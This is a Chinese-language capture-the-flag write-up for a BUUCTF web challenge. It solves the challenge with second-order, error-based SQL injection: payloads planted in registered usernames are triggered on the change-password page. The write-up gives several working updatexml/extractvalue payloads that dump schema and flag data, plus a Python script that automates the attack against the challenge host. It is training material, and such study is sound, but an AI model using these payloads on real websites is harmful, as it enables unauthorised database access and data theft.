一个登录,一个注册
先注册一个账号登录进去
点击用户名,发现可以修改密码
试了一下,没有可以利用的地方
我们再注册一个账号
再次修改密码时,发现有报错
利用报错注入
1"||updatexml(1,concat(0x7e,database(),1),1)#
得到数据库名:web_sqli1
爆破数据表
1"||(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))))#
爆列名
1"||(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')))))#
爆数据
1"||(extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)))))#
换个姿势
1"||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))))#
flag{3ca12c0d-6e95-4757-ac45-6f
读到的flag不完整
倒置输出一下
1"||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))))#
拼接一下,flag:
flag{3ca12c0d-6e95-4757-ac45-6f3472683b23}
再给一个脚本:
import requests
url='http://1144ab58-5e34-46c0-a862-6e01e9b355f0.node4.buuoj.cn:81/'
url1=url+'register.php'
url2=url+'login.php'
url3=url+'changepwd.php'
res=requests.session()
def register(username):
data = {
'username' : username,
'password' : '1',
'email' : '1',
}
res.post(url=url1, data=data)
def login(username):
data = {
'username' : username,
'password' : '1',
}
res.post(url=url2, data=data)
def change():
data = {
'oldpass' : '1',
'newpass' : '1',
}
flagg = res.post(url=url3, data=data)
if 'XPATH' in flagg.text:
print(flagg.text)
def go(username):
register(username)
login(username)
change()
go('1"||(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))))#1')
go('1"||(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")))))#1')
go('1"||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f"))))#1')
go('1"||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f")))))#1')